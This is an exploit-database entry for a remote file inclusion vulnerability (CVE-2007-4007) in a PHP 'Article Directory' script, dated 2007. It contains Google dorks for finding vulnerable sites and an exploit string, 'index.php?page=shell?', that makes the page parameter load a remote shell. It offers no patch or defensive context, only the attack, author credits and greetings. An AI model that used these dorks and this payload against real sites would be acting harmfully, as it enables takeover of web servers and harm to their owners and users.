Article Directory - 'index.php' Remote File Inclusion

Author: mozi
type: webapps
platform: php
port: 
date_added: 2007-07-23  
date_updated:   
verified: 1  
codes: OSVDB-39107;CVE-2007-4007  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 4221.txt  

dork:inurl:index.php%"Submit%Articles"%"Member%Login"%"Top%Authors"
dork:inurl:index.php?pagedb=rss
expl:index.php?page=shell?

original post:http://darkcode.ath.cx/f0rum/ind3x.php?action=vthread&forum=12&topic=114

author:mozi2weed@yahoo.com
greetz:d3hydr8, whoami

#pace

# milw0rm.com [2007-07-24]